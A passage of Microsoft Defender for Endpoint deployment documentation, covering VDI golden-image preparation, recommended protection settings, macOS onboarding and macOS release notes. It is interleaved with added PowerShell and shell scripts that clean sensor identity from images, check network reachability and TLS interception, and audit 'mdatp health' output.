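$GuidValue = '7DC0B629-D7F6-4DB3-9BF7-64D5AAF50F1A'
$GuidKey   = '48A68F11-7A16-4180-B32C-7F974C7BD783'

function Get-MdeImageResidue {
    $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
    $props = Get-ItemProperty -Path $MdeKey -ErrorAction SilentlyContinue
    $r = [ordered]@{
        SenseRunning = [bool]($sense -and $sense.Status -eq 'Running')
        SenseGuid    = $props.senseGuid
        HasGuidValue = ($null -ne $props.$GuidValue)
        HasGuidKey   = [bool](Test-Path -Path (Join-Path $MdeKey $GuidKey))
        CyberFiles   = @(Get-ChildItem -Path $CyberDir -Recurse -File -ErrorAction SilentlyContinue).Count
    }
    # Clean means: sensor stopped, no identity left behind, no cached data.
    $r.Clean = -not ($r.SenseRunning -or $r.SenseGuid -or $r.HasGuidValue -or $r.HasGuidKey -or $r.CyberFiles -gt 0)
    [pscustomobject]$r
}

function Clear-MdeImageResidue {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $state = Get-MdeImageResidue
    if ($state.SenseRunning) {
        throw 'The Sense service is still running: offboard the image and confirm "sc query sense" reports STOPPED first.'
    }
    if ($PSCmdlet.ShouldProcess($CyberDir, 'Delete cached sensor data')) {
        Get-ChildItem -Path $CyberDir -Recurse -File -ErrorAction SilentlyContinue | Remove-Item -Force
    }
    if ($PSCmdlet.ShouldProcess($MdeKey, 'Remove senseGuid and identity values')) {
        Remove-ItemProperty -Path $MdeKey -Name senseGuid, $GuidValue -ErrorAction SilentlyContinue
        Remove-Item -Path (Join-Path $MdeKey $GuidKey) -Recurse -Force -ErrorAction SilentlyContinue
    }
    Get-MdeImageResidue   # re-check; Clean should now be True
}

# Usage on the golden image, elevated: review first, preview the change, then apply it.
Get-MdeImageResidue | Format-List
Clear-MdeImageResidue -WhatIf
```

Running Get-MdeImageResidue as the last step before sealing catches the case the "Are you using a third party for VDIs?" section describes: a template or replica VM that was onboarded at some point and would otherwise hand the same senseGuid to every clone.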

Are you using a third party for VDIs?


If you're deploying non-persistent VDIs through VMware instant cloning or similar
technologies, make sure that your internal template VMs and replica VMs are not
onboarded to Defender for Endpoint. If you onboard devices using the single entry
method, instant clones that are provisioned from onboarded VMs might have the same
senseGuid, and that can stop a new entry from being listed in the Device Inventory view
(in the Microsoft Defender portal, choose Assets > Devices).

If either the primary image, template VM, or replica VM are onboarded to Defender for
Endpoint using the single entry method, it will stop Defender from creating entries for
new non-persistent VDIs in the Microsoft Defender portal.

Reach out to your third-party vendors for further assistance.


Other recommended configuration settings
After onboarding devices to the service, it's important to take advantage of the included
threat protection capabilities by enabling them with the following recommended
configuration settings.

Next generation protection configuration


The following configuration settings are recommended:

Cloud Protection Service


Turn on cloud-delivered protection: Yes
Cloud-delivered protection level: Not configured
Defender Cloud Extended Timeout In Seconds: 20

Exclusions

Review the FSLogix antivirus exclusion recommendations here: Prerequisites
for FSLogix.

Real-time Protection
Turn on all settings and set to monitor all files

Remediation
Number of days to keep quarantined malware: 30
Submit samples consent: Send all samples automatically
Action to take on potentially unwanted apps: Enable
Actions for detected threats:
Low threat: Clean
Moderate threat, High threat, Severe threat: Quarantine

Scan
Scan archived files: Yes
Use low CPU priority for scheduled scans: Not configured
Disable catch-up full scan: Not configured
Disable catchup quick scan: Not configured
CPU usage limit per scan: 50
Scan mapped network drives during full scan: Not configured
Run daily quick scan at: 12 PM
Scan type: Not configured
Day of week to run scheduled scan: Not configured
Time of day to run a scheduled scan: Not configured
Check for signature updates before running scan: Yes

Updates

Enter how often to check for security intelligence updates: 8


Leave other settings in default state

User experience
Allow user access to Microsoft Defender app: Not configured

Enable Tamper protection

Enable tamper protection to prevent Microsoft Defender being disabled: Enable

Attack surface reduction

Enable network protection: Test mode
Require SmartScreen for Microsoft Edge: Yes
Block malicious site access: Yes
Block unverified file download: Yes

Attack surface reduction rules

Configure all available rules to Audit.

Note

Blocking these activities may interrupt legitimate business processes. The best
approach is to set everything to audit, identify which rules are safe to turn on,
and then enable those rules on endpoints that do not have false positive
detections.
Related topics
Onboard Windows devices using Group Policy
Onboard Windows devices using Microsoft Configuration Manager
Onboard Windows devices using Mobile Device Management tools
Onboard Windows devices using a local script
Troubleshoot Microsoft Defender for Endpoint onboarding issues



Onboard non-Windows devices
Article • 01/23/2024

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Endpoint Plan 1

Platforms

macOS
Linux

Want to experience Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint provides a centralized security operations experience for
Windows and non-Windows platforms. You'll be able to see alerts from various
supported operating systems (OS) in Microsoft Defender XDR and better protect your
organization's network.

You'll need to know the exact Linux distros and macOS versions that are compatible with
Defender for Endpoint for the integration to work. For more information, see:

Microsoft Defender for Endpoint on Linux system requirements
Microsoft Defender for Endpoint on macOS system requirements.

Onboarding non-Windows devices


You can choose to onboard non-Windows devices through Microsoft Defender for
Endpoint or through a third-party solution.

Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

You'll need to take the following steps:

1. Select your preferred method of onboarding:

To onboard macOS devices using Microsoft Defender for Endpoint, see
Microsoft Defender for Endpoint on Mac.
To onboard Linux devices using Microsoft Defender for Endpoint, see
Microsoft Defender for Endpoint on Linux.
To onboard non-Windows devices using a third-party solution:
a. In the navigation pane, select Partners and APIs > Connected
Applications. Make sure the third-party solution is listed.
b. In the Connected Applications page, select the partner that supports your
non-Windows devices.
c. Select View to open the partner's page. Follow the instructions provided
on the page.
d. After creating an account or subscribing to the partner solution, you
should get to a stage where a tenant Global Admin in your organization is
asked to accept a permission request from the partner application. Read
the permission request carefully to make sure that it's aligned with the
service that you require.

2. Run a detection test by following the instructions of the third-party solution.

Offboard non-Windows devices

For macOS and Linux devices, you can choose to offboard through Microsoft Defender
for Endpoint. In the navigation pane, select Settings > Offboard > Select Operating
System to start the offboarding process.

For details on offboarding Microsoft Defender on macOS, see Uninstalling Microsoft
Defender for macOS.

You can also offboard non-Windows devices by disabling the third-party integration.
See Enable coverage for devices running non-Windows platforms by integrating third-party
solutions.

Related topics
Onboard Windows devices
Onboard servers
Configure proxy and Internet connectivity settings
Troubleshooting Microsoft Defender for Endpoint onboarding issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Microsoft Defender for Endpoint on Mac
Article • 01/02/2024

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Individuals

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This topic describes how to install, configure, update, and use Defender for Endpoint on
Mac.

Caution

Running other third-party endpoint protection products alongside Microsoft
Defender for Endpoint on Mac is likely to lead to performance problems and
unpredictable side effects. If non-Microsoft endpoint protection is an absolute
requirement in your environment, you can still safely take advantage of Defender
for Endpoint on Mac EDR functionality after configuring the antivirus functionality
to run in Passive mode.

What's new in the latest release

What's new in Microsoft Defender for Endpoint
What's new in Microsoft Defender for Endpoint on Mac

Tip

If you have any feedback that you would like to share, submit it by opening
Microsoft Defender for Endpoint on Mac on your device and navigating to Help >
Send feedback.

To get the latest features, including preview capabilities (such as endpoint detection and
response for your Mac devices), configure your macOS device running Microsoft
Defender for Endpoint to be a Beta channel (formerly Insider-Fast) device.

How to install Microsoft Defender for Endpoint on Mac

Prerequisites
A Defender for Endpoint subscription and access to the Microsoft Defender portal
Beginner-level experience in macOS and Bash scripting
Administrative privileges on the device (in case of manual deployment)

Installation instructions
There are several methods and deployment tools that you can use to install and
configure Defender for Endpoint on Mac.

Third-party management tools:
Microsoft Intune-based deployment
JAMF-based deployment
Other MDM products

Command-line tool:
Manual deployment

System requirements
The three most recent major releases of macOS are supported:
14 (Sonoma), 13 (Ventura), 12 (Monterey)

Important

On macOS 11 (Big Sur) and above, Microsoft Defender for Endpoint requires
additional configuration profiles. If you are an existing customer upgrading
from earlier versions of macOS, make sure to deploy the additional
configuration profiles listed on New configuration profiles for macOS Big Sur
and newer versions of macOS.

Supported processors: x64 and ARM64.

Disk space: 1GB

Beta versions of macOS aren't supported.

After you've enabled the service, you may need to configure your network or firewall to
allow outbound connections between it and your endpoints.

Licensing requirements
Microsoft Defender for Endpoint on Mac requires one of the following Microsoft
Volume Licensing offers:

Microsoft 365 E5 (M365 E5)
Microsoft 365 E5 Security
Microsoft 365 A5 (M365 A5)
Windows 10 Enterprise E5
Microsoft 365 Business Premium
Windows 11 Enterprise E5
Microsoft Defender for Endpoint P2
Microsoft Defender for Endpoint P1 (included in Microsoft 365 E3 (M365 E3))

Note

Eligible licensed users may use Microsoft Defender for Endpoint on up to five
concurrent devices. Microsoft Defender for Endpoint is also available for purchase
from a Cloud Solution Provider (CSP). When purchased via a CSP, it does not
require the Microsoft Volume Licensing offers listed.

Configuring Exclusions
When adding exclusions, be mindful of common exclusion mistakes for Microsoft
Defender Antivirus.

Network connections
The following downloadable spreadsheet lists the services and their associated URLs
that your network must be able to connect to. You should ensure that there are no
firewall or network filtering rules that would deny access to these URLs, or you may
need to create an allow rule specifically for them.

Spreadsheet of domains list: Microsoft Defender for Endpoint URL list for commercial customers
Description: Spreadsheet of specific DNS records for service locations, geographic
locations, and OS for commercial customers. Download the spreadsheet here.

Spreadsheet of domains list: Microsoft Defender for Endpoint URL list for Gov/GCC/DoD
Description: Spreadsheet of specific DNS records for service locations, geographic
locations, and OS for Gov/GCC/DoD customers. Download the spreadsheet here.

Microsoft Defender for Endpoint can discover a proxy server by using the following
discovery methods:

Proxy autoconfig (PAC)
Web Proxy Autodiscovery Protocol (WPAD)
Manual static proxy configuration

If a proxy or firewall is blocking anonymous traffic, make sure that anonymous traffic is
permitted to the previously listed URLs.

Warning

Authenticated proxies are not supported. Ensure that only PAC, WPAD, or a static
proxy is being used.

SSL inspection and intercepting proxies are also not supported for security reasons.
Configure an exception for SSL inspection and your proxy server to directly pass
through data from Microsoft Defender for Endpoint on macOS to the relevant URLs
without interception. Adding your interception certificate to the global store will
not allow for interception.

To test that a connection isn't blocked, open https://x.cp.wd.microsoft.com/api/report
and https://cdn.x.cp.wd.microsoft.com/ping in a browser.

If you prefer the command line, you can also check the connection by running the
following command in Terminal:

Bash
curl -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report' 'https://cdn.x.cp.wd.microsoft.com/ping'

The output from this command should be similar to the following:

OK https://x.cp.wd.microsoft.com/api/report
OK https://cdn.x.cp.wd.microsoft.com/ping
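The curl check above only tells you that something answered. Because the warning earlier in this section rules out SSL inspection even when the inspection CA is trusted by the system, a practitioner also wants to know who issued the certificate the Mac actually received. The script below is an added example, not code from the Microsoft documentation: it wraps the same two test URLs, classifies each response, and reports the TLS issuer seen for each host. INSPECTION_CA is an assumption (a placeholder for a substring of your own inspection proxy's CA subject); the HTTP 200 / body "OK" expectation comes from the sample output above.

```shell
#!/bin/sh
# Added example, not code from the Microsoft documentation: a repeatable version of
# the curl check above that also reports who issued the TLS certificate the client
# actually receives.  An intercepting proxy shows up as the issuer even when its CA
# has been added to the system trust store, which is the case the page says the
# product will refuse.
#
# Assumption (not on the page): INSPECTION_CA holds a substring of your own
# inspection proxy's CA subject, e.g. its CN.  "Corp Inspection CA" is a placeholder.
INSPECTION_CA="${INSPECTION_CA:-Corp Inspection CA}"

# Pure check: takes one `openssl x509 -noout -issuer` line and the inspection-CA
# pattern; prints "intercepted" when the issuer is that CA, "direct" otherwise.
classify_issuer() {
    case "$1" in
        *"$2"*) echo intercepted ;;
        *)      echo direct ;;
    esac
}

# Pure check: takes one line in the "<body> <http_code> <url>" shape produced by
# probe_url below and prints "reachable" only for HTTP 200 with body "OK", which is
# what both test endpoints return.
classify_probe() {
    code=$(printf '%s\n' "$1" | awk '{ print $(NF-1) }')
    body=$(printf '%s\n' "$1" | awk '{ if (NF > 2) print $1; else print "" }')
    if [ "$code" = "200" ] && [ "$body" = "OK" ]; then
        echo reachable
    else
        echo "blocked (HTTP $code)"
    fi
}

# Live probe through whatever HTTPS_PROXY/https_proxy the environment supplies (a PAC,
# WPAD or static proxy; never an authenticated one).  The write-out is appended to
# the body so the result stays a single parseable line even when curl fails (code 000).
probe_url() {
    curl -sS --max-time 15 -w ' %{http_code} %{url_effective}\n' "$1"
}

# Issuer of the leaf certificate presented for a host.  s_client ignores proxy
# variables, so this sees an inline/transparent inspector; for an explicit proxy add
# "-proxy host:port" (OpenSSL 1.1 or later).
tls_issuer() {
    printf '' | openssl s_client -connect "$1:443" -servername "$1" 2>/dev/null \
        | openssl x509 -noout -issuer 2>/dev/null
}

run_checks() {
    for url in https://x.cp.wd.microsoft.com/api/report https://cdn.x.cp.wd.microsoft.com/ping; do
        line=$(probe_url "$url" 2>/dev/null) || true
        [ -n "$line" ] || line=" 000 $url"
        printf '%-48s %s\n' "$url" "$(classify_probe "$line")"
        host=${url#https://}
        host=${host%%/*}
        issuer=$(tls_issuer "$host")
        printf '%-48s %s [%s]\n' "$host" "${issuer:-no certificate returned}" \
            "$(classify_issuer "$issuer" "$INSPECTION_CA")"
    done
}

# Only touch the network when asked to, so the functions can be sourced or tested offline.
if [ "${1:-}" = "--live" ]; then
    run_checks
fi
```

Run it as `INSPECTION_CA='<your CA CN>' sh mde-net-check.sh --live` from a Mac on the network segment being onboarded. A line marked intercepted means the SSL-inspection exception for that host is not in effect yet, whatever the HTTP probe says.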

Caution

We recommend that you keep System Integrity Protection (SIP) enabled on
client devices. SIP is a built-in macOS security feature that prevents low-level
tampering with the OS, and is enabled by default.

Once Microsoft Defender for Endpoint is installed, connectivity can be validated by
running the following command in Terminal:

Bash
mdatp connectivity test
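Connectivity is only one of the things worth verifying after install. The Caution earlier on this page about third-party antivirus (Passive mode), the Full Disk Access and tamper-protection notes, and the conflicting_applications and network_protection_enforcement_level fields described in the release notes all surface in the "key : value" lines that `mdatp health` prints. The following is an added example, not Microsoft's code, that turns that output into a posture check. The exact field names are assumed from current builds (the page names only some of them), so any field a given build does not print is reported as MISSING rather than silently passed; the embedded sample output is constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the Microsoft documentation: a post-onboarding posture
# check for Defender for Endpoint on Mac, built on the "key : value" lines that
# `mdatp health` prints.  Assumption (not stated on the page): the field names below
# are the ones current builds report; a field this build does not print is flagged
# as MISSING rather than silently passed.

# Print the value of one health field.  Input is the full `mdatp health` output on
# stdin; string values are unquoted so callers can compare them directly.
health_field() {
    awk -v key="$1" '
        $1 == key && $2 == ":" {
            v = $3
            for (i = 4; i <= NF; i++) v = v " " $i
            gsub(/^"|"$/, "", v)
            print v
            exit
        }'
}

# Read health output from stdin, print one FAIL/MISSING/WARN line per finding,
# and print nothing when the device matches the expected posture.
check_health() {
    data=$(cat)
    # Hard requirements: onboarding completed, AV enforcing, and the Full Disk
    # Access / tamper-protection settings the Mac page calls out.
    for spec in \
        'healthy=true' \
        'licensed=true' \
        'cloud_enabled=true' \
        'real_time_protection_enabled=true' \
        'full_disk_access_enabled=true' \
        'automatic_definition_update_enabled=true' \
        'definitions_status=up_to_date' \
        'tamper_protection=block'
    do
        key=${spec%%=*}
        want=${spec#*=}
        got=$(printf '%s\n' "$data" | health_field "$key")
        if [ -z "$got" ]; then
            printf 'MISSING %s (not reported by this build)\n' "$key"
        elif [ "$got" != "$want" ]; then
            printf 'FAIL    %s = %s (expected %s)\n' "$key" "$got" "$want"
        fi
    done

    # Passive mode is only acceptable when a non-Microsoft AV is the intended
    # primary engine; flag it so the reviewer confirms that is deliberate.
    if [ "$(printf '%s\n' "$data" | health_field passive_mode_enabled)" = "true" ]; then
        printf 'WARN    passive_mode_enabled = true (EDR only; confirm third-party AV is intended)\n'
    fi

    # Anything other than an empty list here is a process competing with the
    # product's real-time protection (the field shows the 10 most recent).
    apps=$(printf '%s\n' "$data" | health_field conflicting_applications)
    if [ -n "$apps" ] && [ "$apps" != "[]" ]; then
        printf 'WARN    conflicting_applications = %s\n' "$apps"
    fi

    # Network protection in audit mode is a valid rollout stage; report it so
    # it is not forgotten there.
    np=$(printf '%s\n' "$data" | health_field network_protection_enforcement_level)
    if [ -n "$np" ] && [ "$np" != "block" ]; then
        printf 'WARN    network_protection_enforcement_level = %s\n' "$np"
    fi
}

# Constructed sample of `mdatp health` output (values invented for this example)
# so the checker can be exercised on a machine without the product installed.
sample_health() {
    cat <<'EOF'
healthy                                     : true
health_issues                               : []
licensed                                    : true
engine_version                              : "1.1.23100.2010"
app_version                                 : "101.23122.0005"
org_id                                      : "00000000-0000-0000-0000-000000000000"
log_level                                   : "info"
release_ring                                : "Production"
cloud_enabled                               : true
passive_mode_enabled                        : false
real_time_protection_enabled                : true
real_time_protection_available              : true
tamper_protection                           : "block"
automatic_definition_update_enabled         : true
definitions_status                          : "up_to_date"
definitions_updated_minutes_ago             : 12
conflicting_applications                    : []
network_protection_status                   : "started"
network_protection_enforcement_level        : "audit"
full_disk_access_enabled                    : true
EOF
}

# With no arguments: check the real product if mdatp is installed, else the sample.
# With --demo: always run against the constructed sample.
case "${1:-}" in
    --demo) sample_health | check_health ;;
    "")     if command -v mdatp >/dev/null 2>&1; then mdatp health | check_health
            else sample_health | check_health; fi ;;
esac
```

On a fleet, run `mdatp health | sh mde-posture.sh` through your MDM's script facility and collect the output; an empty result is a pass. Treat MISSING lines as a prompt to confirm the field name against the build you actually deployed before assuming the control is absent.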

How to update Microsoft Defender for Endpoint on Mac
Microsoft regularly publishes software updates to improve performance, security, and to
deliver new features. To update Microsoft Defender for Endpoint on Mac, a program
named Microsoft AutoUpdate (MAU) is used. To learn more, see Deploy updates for
Microsoft Defender for Endpoint on Mac.

How to configure Microsoft Defender for Endpoint on Mac
Guidance for how to configure the product in enterprise environments is available in Set
preferences for Microsoft Defender for Endpoint on Mac.

macOS kernel and system extensions
Starting with macOS 11 (Big Sur), Microsoft Defender for Endpoint has been fully
migrated from kernel extension to system extensions.

Resources
For more information about logging, uninstalling, or other topics, see Resources
for Microsoft Defender for Endpoint on Mac.
Privacy for Microsoft Defender for Endpoint on Mac.
Turn on Network protection for macOS

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


What's new in Microsoft Defender for Endpoint on Mac
Article • 09/28/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

For more information on Microsoft Defender for Endpoint on other operating systems:

What's new in Microsoft Defender for Endpoint on Linux
What's new in Microsoft Defender for Endpoint on iOS

Built-in Scheduled Scan for macOS (Public Preview)

Scheduled Scan built-in for Microsoft Defender for Endpoint on macOS is now available
in Public Preview. To learn more, see How to schedule scans with Microsoft Defender for
Endpoint on macOS.

Troubleshooting mode for macOS (Public Preview)

Troubleshooting mode helps you identify instances where antivirus might be causing
issues with your applications or system resources. Troubleshooting mode for macOS is
now available in Public Preview. To learn more, see Troubleshooting mode in Microsoft
Defender for Endpoint on macOS.

Mac devices receive built-in protection

Tamper protection is turned on in block mode by default. This setting helps secure your
Mac against threats. To learn more, see Protect macOS security settings with tamper
protection.

Network protection available for macOS

Network protection for macOS is now available for all Mac devices onboarded to
Defender for Endpoint. Devices must meet the minimum requirements. To learn more,
see Use network protection to help prevent macOS connections to bad sites.

Known issues
Apple has fixed an issue with the macOS Ventura upgrade in the latest OS update. The
issue affects the Microsoft Defender for Endpoint security extensions and might result
in loss of Full Disk Access authorization, which impairs the product's ability to function
properly.

Sonoma support

Microsoft Defender supports macOS Sonoma (14.0) in the current Defender release.

macOS Deprecation

Note

Microsoft Defender for Endpoint no longer supports the following macOS versions,
because Apple ended support for them:

Big Sur (11): December 2023

Jan-2024 (Build: 101.23122.0005 | Release version: 20.123122.5.0)

Build: 101.23122.0005
Release version: 20.123122.5.0
Engine version: 1.1.23100.2010
Signature version: 1.403.3022.0

What's new

[device control] Fixes for Bluetooth devices support
Bug and performance fixes

Dec-2023 (Build: 101.23102.0020 | Release version: 20.123102.20.0)

Build: 101.23102.0020
Release version: 20.123102.20.0
Engine version: 1.1.23090.2005
Signature version: 1.401.1729.0

What's new

Bug and performance fixes

Nov-2023 (Build: 101.23092.0007 | Release version: 20.123092.7.0)

Build: 101.23092.0007
Release version: 20.123092.7.0
Engine version: 1.1.23090.2005
Signature version: 1.399.1196.0

What's new

[device control] set policy for DCv2 via 'mdatp config'
Configuration loading - error logged to
/Library/Logs/Microsoft/mdatp/microsoft_defender_core_err.log includes bad
property name in JSON

Note

If you use Device Control v1, consider migrating to v2 (which includes all v1
functionality and more). Device Control v1 will be deprecated in the near
future. To check, run the mdatp health --details device_control command and
inspect the active property; it should not contain "v1".


Oct-2023 (Build: 101.23082.0018 | Release version: 20.123082.18.0)

Build: 101.23082.0018
Release version: 20.123082.18.0
Engine version: 1.1.23070.1002
Signature version: 1.399.384.0

What's new

[device control] Detailed status with mdatp health --details device_control
[device control] mdatp config device-control policy to set policy on a
nonmanaged machine
Bug and performance fixes

Sep-2023 (Build: 101.23072.0025 | Release version: 20.123072.25.0)

Build: 101.23072.0025
Release version: 20.123072.25.0
Engine version: 1.1.23050.3
Signature version: 1.397.911.0

What's new

Bug and performance fixes
Fix: Security Portal events might have missed ancestors details for short lived
processes
Fix: Major performance issues on macOS when Network Protection is set to Audit
mode

Aug-2023 (Build: 101.23062.0016 | Release version: 20.123062.16.0)

Build: 101.23062.0016
Release version: 20.123062.16.0
Engine version: 1.1.23050.3
Signature version: 1.395.436.0

What's new

Bug and performance fixes
Fix: macOS complains that uninstall background task is from unidentified
developer

Jul-2023 (Build: 101.23052.0004 | Release version: 20.123052.4.0)

Build: 101.23052.0004
Release version: 20.123052.4.0
Engine version: 1.1.20100.7
Signature version: 1.391.2163.0

What's new

Client version schema change
Fix: Defender doesn't start on a machine with certain versions of Microsoft Edge
due to directory permission issue
Bug and performance fixes

Jun-2023 (Build: 101.98.84 | Release version: 20.123042.19884.0)

Build: 101.98.84
Release version: 20.123042.19884.0
Engine version: 1.1.20300.4
Signature version: 1.391.221.0

What's new

System Extensions health command mdatp health --details system_extensions
Bug and performance fixes

May-2023 (Build: 101.98.71 | Release version: 20.123032.19871.0)

Build: 101.98.71
Release version: 20.123032.19871.0
Engine version: 1.1.20300.4
Signature version: 1.389.1872.0

What's new

Tamper Protection health command mdatp health --details tamper_protection
Tamper Protection - MDM processes exclusions
Fix: Remove Codesigned Artifact from App Bundle
Bug and performance fixes

May-2023 (Build: 101.98.70 | Release version: 20.123022.19870.0)

Build: 101.98.70
Release version: 20.123022.19870.0
Engine version: 1.1.20300.4
Signature version: 1.389.1396.0

What's new

Bug and performance fixes

Mar-2023 (Build: 101.98.30 | Release version: 20.123012.19830.0)

Build: 101.98.30
Release version: 20.123012.19830.0
Engine version: 1.1.20100.6
Signature version: 1.385.924.0

What's new

Bug and performance fixes

Feb-2023 (Build: 101.97.94 | Release version: 20.123011.19794.0)

Build: 101.97.94
Release version: 20.123011.19794.0
Engine version: 1.1.20000.2
Signature version: 1.383.104.0

What's new

Improved performance, stability, and security
Bug fixes
Discontinued support for macOS Catalina [10.15]

Build: 101.96.85
Release version: 20.122112.19413.0
Engine version: 1.1.19900.2
Signature version: 1.381.2029.0

What's new

Bug and performance fixes

Build: 101.90.97
Release version: 20.122102.19097.0
Engine version: 1.1.19900.2
Signature version: 1.381.202.0

What's new

Scanning optimization for move file operations
Adding exclusions from command line now requires admin privileges
Decrease sysextd noise from Tamper Protection in Advanced Hunting
Bug and performance fixes

Released: Nov 5, 2022
Published: Nov 5, 2022
Build: 101.87.30
Release version: 20.122082.18681.0
Engine version: 1.1.19700.3
Signature version: 1.379.17.0

What's new

Fix for some users experiencing performance issues and temporary system hangs
Bug and performance fixes

Released: Oct 25, 2022
Published: Oct 25, 2022
Build: 101.86.81
Release version: 20.122082.18681.0
Engine version: 1.1.19700.3
Signature version: 1.377.636.0

What's new

Bug fix: Upgrade fails if the _mdatp user is a member of the _lpadmin group

Important

This is the minimum recommended MDE version for macOS Ventura.

Oct-2022 (Build: 101.82.21 | Release version: 20.122082.18221.0)

Build: 101.82.21
Release version: 20.122082.18221.0
Engine version: 1.1.19400.3
Signature version: 1.369.962.0

What's new

Bug fix - Mac TP in Block mode causing device hang on shutdown/crashes on
reboot
Add a mdatp command-line switch to view the on-demand scan history
Improve Performance of Device Owner on macOS
Ready for macOS Ventura (13.0)
Bug and performance fixes

Build: 101.78.13
Release version: 20.122072.17813.0
Engine version: 1.1.19500.2
Signature version: 1.373.556.0

What's new

Fix for uninstaller to properly delete Application Support folder
Fix for Network Protection not filtering Safari when Firewall or iCloud Private Relay
is on
Fix for osqueryui zombie processes
Fix for UI crash on Ventura
Fix for definitions not getting downloaded right after install
Other bug fixes

Released: Aug 3, 2022
Published: Aug 3, 2022
Build: 101.75.90
Release version: 20.122071.17590.0
Engine version: 1.1.19300.3
Signature version: 1.369.395.0

What's new

Added a new field in the output of mdatp health that can be used to query the
enforcement level of the network protection feature. The new field is called
network_protection_enforcement_level and can take one of the following values:
audit, block, or disabled.

Addressed a product bug where multiple detections of the same content could
lead to duplicate entries in the threat history.
Other bug fixes.

Released: Jul 21, 2022
Published: Jul 21, 2022
Build: 101.73.77
Release version: 20.122062.17377.0
Engine version: 1.1.19200.3
Signature version: 1.367.1011.0

What's new

Addressed an issue where printing couldn't be completed successfully due to the
network extension
Added an option to configure file hash computation
From this build onwards, the product has the new anti-malware engine by default
Performance improvements for file copy operations
Bug fixes

Released: Jul 7, 2022
Published: Jul 7, 2022
Build: 101.71.18
Release version: 20.122052.17118.0

What's new

mdatp connectivity test added an extra URL. The new URL is
https://go.microsoft.com/fwlink/?linkid=2144709.
Up until now, the product log level didn't persist between product restarts.
Beginning in this version, there's a new command-line tool switch that persists the
log level. The new command is mdatp log level persist --level <level> .
Fixed a bug in the product installation package that in rare cases could lead a loss
of product state during updates
Performance improvements for file copy operations and built-in macOS
applications
Bug fixes

Released: Jun 14, 2022
Published: Jun 14, 2022
Build: 101.70.19
Release version: 20.122051.17019.0

What's new

Fixed a bug where threat-related notifications weren't always presented to the end
user.
Performance improvements & other updates.

Released: Jun 2, 2022
Published: Jun 2, 2022
Build: 101.70.18
Release version: 20.122042.17018.0

What's new

Fixed a bug where the installation package was sometimes hanging indefinitely
during product updates
Fixed a bug where the product sometimes was incorrectly detecting files inside the
quarantine folder
Performance improvements & other bug fixes
Released: May 11, 2022
Published: May 11, 2022
Build: 101.66.54
Release version: 20.122041.16654.0

What's new

Addressed an issue where mdatp diagnostic real-time-protection-statistics
wasn't printing the correct process path in some cases.
Bug fixes

Released: Apr 26, 2022
Published: Apr 26, 2022
Build: 101.64.15
Release version: 20.122032.16415.0

What's new

Fixed a regression introduced in version 101.61.69 where the status menu icon was
sometimes showing an error icon, even though no action was required from the
end user
Improved the conflicting_applications field in mdatp health to show only the
most recent 10 processes and also to include the process names. This makes it
easier to identify which processes are potentially conflicting with Microsoft
Defender for Endpoint for Mac.
Fixed a bug in mdatp device-control removable-media policy list where vendor
ID and product ID were displayed as decimal instead of hexadecimal
Performance improvements & other bug fixes

Released: Mar 25, 2022
Published: Mar 25, 2022
Build: 101.61.69
Release version: 20.122022.16169.0

What's new

Bug fixes
Released: Mar 8, 2022
Published: Mar 8, 2022
Build: 101.60.91
Release version: 20.122021.16091.0

What's new

This version contains a security update for CVE-2022-23278

Released: Feb 28, 2022
Published: Feb 28, 2022
Build: 101.59.50
Release version: 20.122021.15950.0

What's new

This version adds support for macOS 12.3. Starting with macOS 12.3, Apple is
removing Python 2.7. There's no Python version preinstalled on macOS by
default. ACTION NEEDED:
Users must update Microsoft Defender for Endpoint for Mac to version
101.59.50 (or newer) before updating their devices to macOS Monterey 12.3 (or
newer). This minimal version 101.59.50 is a prerequisite to eliminating
Python-related issues with Microsoft Defender for Endpoint for Mac on macOS
Monterey.
For remote deployments, existing MDM setups must be updated to Microsoft
Defender for Endpoint for Mac version 101.59.50 (or newer). Pushing via MDM
an older Microsoft Defender for Endpoint for Mac version to macOS Monterey
12.3 (or newer) results in an installation failure.

Feb-2022 (Build: 101.59.10 | Release version: 20.122012.15910.0)

Released: Feb 22, 2022
Published: Feb 22, 2022
Build: 101.59.10
Release version: 20.122012.15910.0

What's new

The command-line tool now supports restoring quarantined files to a location
other than the one where the file was originally detected. This can be done
through mdatp threat quarantine restore --id [threat-id] --path [destination-folder].
Extended device control to handle devices connected over Thunderbolt 3
Improved the handling of device control policies containing invalid vendor IDs and
product IDs. Before this version, if the policy contained one or more invalid IDs, the
entire policy was ignored. Starting from this version, only the invalid portions of
the policy are ignored. Issues with the policy are surfaced through mdatp device-control
removable-media policy list.

Bug fixes

Released: Feb 7, 2022
Published: Feb 7, 2022
Build: 101.56.62
Release version: 20.121122.15662.0

What's new

Bug fixes

Released: Jan 30, 2022
Published: Jan 30, 2022
Build: 101.56.35
Release version: 20.121121.15635.0

What's new

The application is renamed from "Microsoft Defender ATP" to "Microsoft
Defender". End users observe the following changes:
The application installation path has been changed from /Applications/Microsoft
Defender ATP.app to /Applications/Microsoft Defender.app.
Within the user experience, occurrences of "Microsoft Defender ATP" have been
replaced with "Microsoft Defender"
Resolved an issue where some VPN applications couldn't connect due to the
network content filter that is distributed with Microsoft Defender for Endpoint for
Mac
Addressed an issue discovered in macOS 12.2 preview 2 where the installation
package couldn't be opened due to a change in the operating system (OS) that
prevents installation of packages with certain characteristics. While it appears that
this OS change isn't included in the final release of macOS 12.2, it's likely that it will
be reintroduced in a future macOS version. As such, we encourage all enterprise
administrators to refresh the Microsoft Defender for Endpoint package in their
management console to this product version (or a newer version).
